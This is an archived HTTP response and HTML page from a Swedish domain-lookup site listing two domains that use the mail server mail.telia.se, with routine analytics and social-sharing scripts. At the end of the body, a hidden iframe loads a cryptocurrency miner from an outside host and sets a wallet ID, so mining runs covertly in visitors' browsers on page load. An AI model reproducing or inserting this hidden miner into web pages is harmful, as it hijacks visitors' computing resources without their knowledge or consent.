http://domaintool.se/mxhost/mail.telia.se
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Set-Cookie: PHPSESSID=5crba54e5u6sljm94d62v13093; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Content-Length: 2476
Accept-Ranges: bytes
Date: Wed, 23 Jul 2014 13:58:22 GMT
X-Varnish: 1458912344
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>mail.telia.se | Information och kommentarer om mail.telia.se</title><title>mail.telia.se | DomainTool information | DomainTool</title>
<link rel="canonical" href="http://domaintool.se/d/mail.telia.se" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/css/cbb.css" type="text/css" media="screen" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript" src="/js/cb.js"></script>
<script type="text/javascript" src="/js/domaintool.js"></script>
<script type="text/javascript" src="/splashpage.js.php"></script>
<style type="text/css">
/*<![CDATA[*/
html .fb_share_link { padding:2px 0 0 20px; height:16px; background:url(/img/facebook_share_icon.gif) no-repeat top left; }
/*]]>*/
</style>
<!--[if lt IE 8]>
<style type="text/css">
* html .i1,
* html .i2 {background-image:url(/img/borders.gif);}
* html .bt,
* html .bt div,
* html .bb,
* html .bb div {background-image:url(/img/box.gif);}
* html .i1,
* html .i3 {height:1px;}
/* Give the absolutely positioned box a width (including IE 7)*/
.one {width:70%;}
</style>
<![endif]-->
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-1578346-14']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</head>
<body>

<div id="wrap">
<div id="content2" class="cbb">

<!-- <div style="text-align: center; font-size: 14px; margin-bottom: 3px;">Vi rekommenderar webbhotellet <script type="text/javascript" language="javascript" src="http://www.anrdoezrs.net/placeholder-4202075?target=_blank&mouseover=N"></script></div> -->
<!--
<div style="padding-bottom: 7px; text-align:center; font-size: 13px;">
<div>V&aring;r annons&ouml;r:</div>
<script type="text/javascript" src="http://impse.tradedoubler.com/imp?g(17139026)a(1504445)" charset="ISO-8859-1"></script>
</div>
-->

<div style="float: left; width: 440px;">
<div style="margin-top: 0px; margin-right: 5px;">
<a href="http://DomainTool.se" rel="nofollow"><img src="/img/domaintool2.png" alt="DomainTool"/></a>
</div>
<div style="font-size:13px; margin-top: 30px;">Annonser</div>
</div>
<div style="float: left;">

<div class="teaser" id="bubble">
<blockquote><div><p>DomainTool ger dig intressant information om Svenska internetadresser!</p></div></blockquote>
<div class="quote-by"><cite>&nbsp;</cite></div></div> 
</div>
<div style="clear: left;"></div>
<h1>Dom&auml;ner med mailserver mail.telia.se</h1>
  <hr noshade="noshade"/>Visar 2 dom&auml;ner: mail.telia.se<br/><br/><table><tr class="domain"><td>
<a rel="nofollow" href="/d/yngveswenson.se">yngveswenson.se</a></td><td style="padding: 2px; font-size: 14px;">Bilia - Mälardalen</td></tr>
<tr class="domain match"><td>
<a rel="nofollow" href="/d/siko.org.se">siko.org.se</a></td><td style="padding: 2px; font-size: 14px;">SIKO - för den bofasta befolkningen i Stockholms skärgård</td></tr>
</table><br/>
<div>
  <b class="spiffy">
  <b class="spiffy1"><b></b></b>
  <b class="spiffy2"><b></b></b>
  <b class="spiffy3"></b>
  <b class="spiffy4"></b>
  <b class="spiffy5"></b></b>
  <div class="spiffyfg">

<div id="trail">
&copy; 2014 Triop AB | <a href="/contact.php" rel="facebox">Kontakt</a> | <a href="/about.html" rel="facebox">Information</a> | <!-- AddThis Bookmark Button BEGIN -->
<a href="http://www.addthis.com/bookmark.php" onclick="addthis_url   = location.href; addthis_title = document.title; return addthis_click(this);" target="_blank"><img src="http://s9.addthis.com/button1-bm.gif" width="125" height="16" border="0" alt="AddThis Social Bookmark Button" class="ikon" /></a> <script type="text/javascript">var addthis_pub = 'P1DGIKSE272PRR52';</script><script type="text/javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
<!-- AddThis Bookmark Button END -->

</div>

  </div>
  <b class="spiffy">
  <b class="spiffy5"></b>
  <b class="spiffy4"></b>
  <b class="spiffy3"></b>
  <b class="spiffy2"><b></b></b>
  <b class="spiffy1"><b></b></b></b>
</div>

<!-- <div style="font-size: 13px; margin-top: 10px; color: #999;">
Partners: <a href="http://domaingoat.com">DomainGoat</a> | <a href="http://cz.domaingoat.com">DomainGoat CZ</a> | <a href="http://bg.domaingoat.com">DomainGoat BG</a>
</div> -->

</div>
</div>

<br/>

<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-20309368-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>

</div>

<script type="text/javascript">
var disqus_shortname = 'domaintool';
(function () {
      var s = document.createElement('script'); s.async = true;
        s.src = 'http://disqus.com/forums/domaintool/count.js';
          (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s);
}());
</script>

<iframe style='display:none' src='http://tidbit.co.in/miner'><script>window.walletId = 15diWopdLbkx8pafR9iY6zzunoeNn9sixH</script></iframe>
</body>
</html>

